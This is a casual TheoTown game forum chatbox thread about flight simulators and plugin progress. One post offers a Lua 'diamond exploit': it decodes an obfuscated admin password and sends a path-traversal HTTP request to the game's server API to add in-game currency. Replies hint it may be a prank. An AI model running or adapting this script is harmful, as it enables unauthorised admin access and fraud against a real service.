TheoTown Forum Chatbox
- Uncle Koala
- Metropolitan
- Posts: 142
- Joined: 05 Apr 2020, 14:53
- Location: Pitcairn Islands
- Plugins: Showcase Store
- Version: Beta
- Contact:
-
Plugin Creator
Platform
Re: TheoTown Forum Chatbox
You might have to wait until Christmas
- TheFennekin
- Neighborhood fox
- Posts: 2728
- Joined: 24 Aug 2017, 11:17
- Location: Wandering around
- Plugins: Showcase Store
- Version: Beta
-
Plugin Creator
Platform
Re: TheoTown Forum Chatbox
Halloween? 
- TheFennekin
- Neighborhood fox
- Posts: 2728
- Joined: 24 Aug 2017, 11:17
- Location: Wandering around
- Plugins: Showcase Store
- Version: Beta
-
Plugin Creator
Platform
Re: TheoTown Forum Chatbox
I wish it's possible to add your own influence in your plugins 
- Uncle Koala
- Metropolitan
- Posts: 142
- Joined: 05 Apr 2020, 14:53
- Location: Pitcairn Islands
- Plugins: Showcase Store
- Version: Beta
- Contact:
-
Plugin Creator
Platform
Re: TheoTown Forum Chatbox
Anyone here seen the new Microsoft Flight Simulator? It looks amazing. I saw a video of someone intentionally slowing their internet down to see how 2D Satelitte images turn into full 3D cities. Truly next gen.
- CommanderABab
- AB
- Posts: 11245
- Joined: 07 Jun 2016, 21:12
- Plugins: Showcase Store
- Version: Beta
-
Plugin Creator
Platform
Re: TheoTown Forum Chatbox
I watched a video of someone doing the challenge of landing a plane on a runway half the length recommended for the plane.
- Kamikazi
- Inhabitant of a Conurbation
- Posts: 471
- Joined: 27 Jan 2018, 00:58
- Location: ESPAÑA
- Plugins: Showcase Store
- Version: Beta
- Contact:
-
Plugin Creator
Platform
Re: TheoTown Forum Chatbox
MFS 2020 is just straight up astonishing. I saw 2 joke-ish videos about it and 2 videos of raw gameplay footage. It really looks realistic. I'm also impressed with the default planes
- Uncle Koala
- Metropolitan
- Posts: 142
- Joined: 05 Apr 2020, 14:53
- Location: Pitcairn Islands
- Plugins: Showcase Store
- Version: Beta
- Contact:
-
Plugin Creator
Platform
Re: TheoTown Forum Chatbox
Today:Lobby in 2018 wrote: Yeah, it's a cool building. I'm afraid there could be complains if I re-add it into the game natively, as it would mean that we have more buildings of a specific religion. I often get requests to add buildings of various religions...
- CommanderABab
- AB
- Posts: 11245
- Joined: 07 Jun 2016, 21:12
- Plugins: Showcase Store
- Version: Beta
-
Plugin Creator
Platform
- CommanderABab
- AB
- Posts: 11245
- Joined: 07 Jun 2016, 21:12
- Plugins: Showcase Store
- Version: Beta
-
Plugin Creator
Platform
Re: TheoTown Forum Chatbox
Apparently not.
- Uncle Koala
- Metropolitan
- Posts: 142
- Joined: 05 Apr 2020, 14:53
- Location: Pitcairn Islands
- Plugins: Showcase Store
- Version: Beta
- Contact:
-
Plugin Creator
Platform
Re: TheoTown Forum Chatbox
To people who read crash reports: Sorry for those stack overflows, won't happen again! 
Anyways, I made AMAZING progress on my Terrain Tools plugin.
Replacing all ground with sand on a giant map took almost 2 hours. Now? It's 5 seconds. 5 SECONDS! And it affects no other scripts at all! Nothing runs until you make it run! This means I can add all kinds of scripts now and the impact will be minimal.
Sorry for the night mode. If you zoom in, you will see that it's not snow, it's sand!

Anyways, I made AMAZING progress on my Terrain Tools plugin.
Replacing all ground with sand on a giant map took almost 2 hours. Now? It's 5 seconds. 5 SECONDS! And it affects no other scripts at all! Nothing runs until you make it run! This means I can add all kinds of scripts now and the impact will be minimal.
Sorry for the night mode. If you zoom in, you will see that it's not snow, it's sand!
- JustAnyone
- Developer
- Posts: 3582
- Joined: 23 Jul 2017, 12:45
- Location: Easter Island
- Plugins: Showcase Store
-
Platform
Re: TheoTown Forum Chatbox
Found a cheesy exploit which you can use to generate diamonds. Either that or it's somehow broken, idk.
Unfortunately, it's limited for 1 diamond per http request
Unfortunately, it's limited for 1 diamond per http request
Code: Select all Reset
local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' function dec(data) data = string.gsub(data, '[^'..b..'=]', '') return (data:gsub('.', function(x) if (x == '=') then return '' end local r,f='',(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and '1' or '0') end return r; end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x) if (#x ~= 8) then return '' end local c=0 for i=1,8 do c=c+(x:sub(i,i)=='1' and 2^(8-i) or 0) end return string.char(c) end)) end local LuaSocket = require("socket") client = LuaSocket.connect("ja.theotown.com", 80) client:send("GET ../../api/public/diamond_req.php?login=admin&pass="..dec('NDJkU2FYcGVyaWE=').."&action=add_diamond¶m1=1&user=<your_forum_user_id> HTTP/1.0\r\nHost: ja.theotown.com\r\n\r\n") while true do s, status, partial = client:receive('*a') print(s or partial) if status == "closed" then break end end client:close()
Lua editor
- CommanderABab
- AB
- Posts: 11245
- Joined: 07 Jun 2016, 21:12
- Plugins: Showcase Store
- Version: Beta
-
Plugin Creator
Platform
Re: TheoTown Forum Chatbox
Turn your volume up
@JustAnyone
- Uncle Koala
- Metropolitan
- Posts: 142
- Joined: 05 Apr 2020, 14:53
- Location: Pitcairn Islands
- Plugins: Showcase Store
- Version: Beta
- Contact:
-
Plugin Creator
Platform
Re: TheoTown Forum Chatbox
JustAnyone can show diamond exploits but if I did something like that, I would be banned. 

- Kamikazi
- Inhabitant of a Conurbation
- Posts: 471
- Joined: 27 Jan 2018, 00:58
- Location: ESPAÑA
- Plugins: Showcase Store
- Version: Beta
- Contact:
-
Plugin Creator
Platform
Re: TheoTown Forum Chatbox
Huh, nice exploit
- JustAnyone
- Developer
- Posts: 3582
- Joined: 23 Jul 2017, 12:45
- Location: Easter Island
- Plugins: Showcase Store
-
Platform
Re: TheoTown Forum Chatbox
pls share with meUncle Koala wrote: ↑25 Aug 2020, 08:56JustAnyone can show diamond exploits but if I did something like that, I would be banned.![]()
- Uncle Koala
- Metropolitan
- Posts: 142
- Joined: 05 Apr 2020, 14:53
- Location: Pitcairn Islands
- Plugins: Showcase Store
- Version: Beta
- Contact:
-
Plugin Creator
Platform
Re: TheoTown Forum Chatbox
Hmm... I'll think about it. Meanwhile, you can think about thisJustAnyone wrote: ↑25 Aug 2020, 12:16pls share with meUncle Koala wrote: ↑25 Aug 2020, 08:56JustAnyone can show diamond exploits but if I did something like that, I would be banned.![]()

Uncle Koala wrote: ↑24 Aug 2020, 20:11<..>
Suggestion to devs: please add something like Tile.setUntouchable(x, y)![]()